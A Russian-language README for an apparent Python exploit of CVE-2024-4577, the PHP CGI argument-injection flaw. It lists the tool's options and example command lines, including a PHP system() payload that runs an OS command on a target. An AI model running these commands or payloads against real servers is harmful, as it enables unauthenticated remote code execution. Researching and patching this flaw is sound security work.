
Эксплойт на Python для CVE-2024-4577 — внедрение аргументов PHP CGI, позволяющее неаутентифицированное удаленное выполнение кода на серверах Windows с определенными локалями.
Уязвимость CVE-2024-4577 в PHP CGI представляет собой критическую проблему безопасности, позволяющую удалённое выполнение кода через внедрение аргументов. Обнаруженная в нескольких версиях PHP, эта уязвимость в первую очередь затрагивает серверы, работающие в определённых локалях (традиционный китайский, упрощённый китайский, японский) на Windows.
Ошибка использует режим PHP CGI, обходя предыдущие меры безопасности и позволяя неаутентифицированным атакующим выполнять произвольный код.
Скрипт эксплойта:
usage: python exploit.py -t http://127.0.0.1 -c calc
options:
-h, --help show this help message and exit
--target TARGET, -t TARGET
Target URL
--code CODE, -c CODE OS command to execute
--php PHP, -p PHP PHP command to execute
Пример:
python3 exploit.py 192.168.130.100 80 calc
python .\CVE-2024-4577.py -t http://127.0.0.1 -p "<?php system('calc') ?>"

Данный скрипт эксплойта создан исключительно для исследований и разработки эффективных методов защиты. Он не предназначен для какого-либо вредоносного или несанкционированного использования. Автор и владелец скрипта снимают с себя любую ответственность за неправомерное использование или ущерб, причинённый данным программным обеспечением. Имейте в виду, что пользователям настоятельно рекомендуется использовать это программное обеспечение ответственно и только в соответствии с действующими законами и нормативными актами. Используйте ответственно.